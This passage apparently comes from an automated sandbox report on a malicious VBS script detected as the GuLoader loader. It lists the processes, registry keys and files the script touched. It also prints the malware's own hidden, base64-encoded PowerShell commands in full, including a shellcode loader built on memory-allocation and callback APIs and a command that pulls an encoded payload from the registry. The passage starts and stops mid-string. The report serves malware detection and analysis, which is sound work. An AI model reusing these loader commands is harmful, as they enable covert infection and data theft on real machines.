B0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAGJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAGJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uotckr0j.cmdline
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vybs2gqu.cmdline
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES34E6.tmp" "c:\Users\user\AppData\Local\Temp\CSC77023F4354E6477E97855CB603CA0.TMP"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES728B.tmp" "c:\Users\user\AppData\Local\Temp\CSC9CB81DB86B7E400B9F74BAF89293FF3.TMP"
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20211125Jump to behavior
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\Depopulato2.datJump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winVBS@30/40@1/2
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeMutant created: \Sessions\1\BaseNamedObjects\ihrYOjDo
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6640:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2528:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6640:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2528:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:304:WilStaging_02
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\DETAILS.vbs"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Binary string: $pm/C:\Users\user\AppData\Local\Temp\mla4kvb3.pdb source: powershell.exe, 00000003.00000002.15262680896.0000000004F79000.00000004.00000001.sdmp
            Source: Binary string: $pm/C:\Users\user\AppData\Local\Temp\vybs2gqu.pdb source: powershell.exe, 0000000E.00000002.16353125853.0000000005015000.00000004.00000001.sdmp
            Source: Binary string: $pm/C:\Users\user\AppData\Local\Temp\uotckr0j.pdb source: powershell.exe, 0000000D.00000002.16211068158.0000000004F11000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.16210155377.0000000004E74000.00000004.00000001.sdmp

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 00000014.00000000.16108270980.0000000003000000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.16237325177.0000000009770000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.16379281085.00000000098B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.15295840627.0000000009B70000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.16194415539.0000000002D20000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.15018322075.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000000.15958445085.0000000002D20000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.16334182427.0000000003000000.00000040.00000001.sdmp, type: MEMORY
            Suspicious powershell command line foundShow sources
            Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden $discommo=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Nydelsesmi;powershell.exe -windowstyle hidden -encodedcommand($discommo)
            Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden $discommo=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Nydelsesmi;powershell.exe -windowstyle hidden -encodedcommand($discommo)
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAG
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAG
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbg